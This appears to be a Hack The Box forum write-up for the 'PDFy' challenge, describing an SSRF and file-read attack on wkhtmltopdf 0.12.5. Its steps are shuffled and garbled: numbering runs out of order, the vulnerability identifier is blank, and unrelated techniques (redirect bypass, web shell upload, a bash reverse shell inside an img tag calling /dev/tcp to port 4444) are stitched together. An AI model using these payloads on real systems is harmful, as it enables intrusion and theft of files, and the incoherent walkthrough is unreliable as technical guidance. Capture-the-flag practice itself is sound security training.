Official PDFy Discussion - Challenges - Hack The Box :: Forums
Upon navigating to the target IP address and port in your browser, you are met with a clean, minimalist web utility. The primary interface features a single input box requesting a URL.

1. Basic Functionality Test
With the exact software and version identified ( wkhtmltopdf 0.12.5 ), the next step is to search for any known vulnerabilities. This specific version is vulnerable to a high-severity SSRF flaw, officially tracked as .
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>">
The challenge presents a web application designed to take a user-supplied URL and convert that web page into a downloadable PDF document. By understanding how the backend PDF rendering engine processes redirects, you can bypass local restrictions to read sensitive system files and capture the flag.
The PDFy interface lets users input a website address. The application visits the URL, takes a screenshot, and serves it back inside a dynamically generated PDF document.

Web Exploitation
Difficulty Rating:
Primary Vulnerability: Server-Side Request Forgery (SSRF)
Secondary Impact: Local File Inclusion (LFI) via redirection
Target Binary: Underlying wkhtmltopdf

Phase 1: Reconnaissance & Enumeration

Step 1: Analyze the Front-End Interaction
Since the server fetches and renders the URL, you can use the file:// protocol to point it toward internal system files.
User-controlled input should never be passed directly to backend rendering engines or system commands without rigorous sanitization and validation.
cat /home/robert/user.txt
Before triggering the payload, we set up a listener on our local machine (e.g., using nc -lvnp 4444 ) to catch the incoming connection.
If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd ), the application will typically have a blacklist filter in place to block it.

3. Exploiting the SSRF (Bypassing the Filter)
Create a file named index.html in the root of your local web server's directory.
Open or view the generated PDF file through the web browser or download it locally. The document should now display the contents of the machine's local configuration files.
To achieve RCE, we need to upload a web shell. We can do this by using the LFI to find a way to write to a PHP file, or more directly, exploiting the underlying PDF converter.